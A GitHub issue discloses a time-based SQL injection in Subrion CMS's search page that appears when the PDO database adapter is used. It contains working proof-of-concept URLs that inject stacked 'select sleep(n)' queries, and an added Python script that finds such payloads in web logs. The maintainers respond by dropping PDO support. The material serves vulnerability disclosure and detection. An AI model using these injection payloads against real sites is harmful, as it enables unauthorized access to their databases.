There is a time-based sql injection if use PDO #817

Closed
yundiao opened this issue Apr 3, 2019 · 2 comments

yundiao commented Apr 3, 2019

I. Vulnerability Analysis
Subrion CMS supports three ways of connecting to MySQL: mysql, mysqli and PDO. The default is mysqli.
They are executed by three files in the /includes/classes/ directory:
ia.core.mysql.php
ia.core.mysqli.php
ia.core.pdo.php
If a website uses a PDO connection, there will be a vulnerability.

II. Vulnerability testing
Using PDO connections requires modifying the file /includes/config.inc.php.
Change mysqli to pdo.
[Screenshot: database_config]

In the search page:
http://cms.im/search/

POC and testing:

/search/?q=);select%20sleep(1);--+

[Screenshot: sleep(1)]

/search/?q=);select%20sleep(5);--+

[Screenshot: sleep(5)]

/search/?q=);select%20sleep(10);--+

[Screenshot: sleep(10)]
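
For sites that ran the PDO adapter, one way to triage web logs for the PoC above, as an added example that is not part of the issue or Subrion's code: it flags /search/ requests whose q parameter carries a stacked SELECT SLEEP(n) and compares n with the logged request duration to separate probes from requests where the delay actually happened. The log format (duration in seconds as the last field), the function names and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample lines (not from the issue): combined-style access log with
# the request duration in seconds appended as the last field.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Apr/2019:10:00:01 +0000] "GET /search/?q=subrion+templates HTTP/1.1" 200 5120 0.042
203.0.113.9 - - [03/Apr/2019:10:00:05 +0000] "GET /search/?q=);select%20sleep(5);--+ HTTP/1.1" 200 4980 5.037
203.0.113.9 - - [03/Apr/2019:10:00:20 +0000] "GET /search/?q=);select%20sleep(10);--+ HTTP/1.1" 200 4980 10.041
198.51.100.4 - - [03/Apr/2019:10:01:00 +0000] "GET /search/?q=);select%20sleep(5);--+ HTTP/1.1" 200 4980 0.051
198.51.100.8 - - [03/Apr/2019:10:02:00 +0000] "GET /search/?q=how+to+sleep(better) HTTP/1.1" 200 5001 0.039
"""

LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" \d{3} \d+ ([\d.]+)$')
# A statement terminator followed by SELECT SLEEP(n): the stacked-query shape
# of the PoC in the issue. This is not a general SQL injection signature.
SLEEP_RE = re.compile(r';\s*select\s+sleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)', re.I)

def search_term(target):
    """Return the URL-decoded q parameter of a /search/ request, else None."""
    parts = urlsplit(target)
    if not parts.path.startswith('/search'):
        return None
    # Split on '&' only: the payload itself contains ';'.
    for pair in parts.query.split('&'):
        key, _, value = pair.partition('=')
        if key == 'q':
            return unquote_plus(value)
    return None

def classify(log_text):
    """Return (client, requested_sleep, duration, verdict) for each PoC-shaped hit."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, duration = m.group(1), m.group(2), float(m.group(3))
        q = search_term(target)
        hit = SLEEP_RE.search(q) if q else None
        if hit:
            asked = float(hit.group(1))
            # A response at least as slow as the requested sleep means the
            # injected statement ran; a fast response is only a probe.
            verdict = 'executed' if duration >= asked else 'attempt'
            findings.append((client, asked, duration, verdict))
    return findings
```

An `executed` verdict is grounds for treating the host as having run attacker-supplied SQL; an `attempt` verdict is consistent with a backend on the default mysqli adapter.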

vbezruchkin (Member) commented

@AleksandrPanarin please drop support for PDO. We don't have any customers who use our system with non mysql.

AleksandrPanarin pushed a commit that referenced this issue Apr 24, 2019
vbezruchkin pushed a commit that referenced this issue Apr 24, 2019

vbezruchkin (Member) commented

We decided to drop support for PDO as MySQLi seems to be the only adapter used by our customers.

Thanks
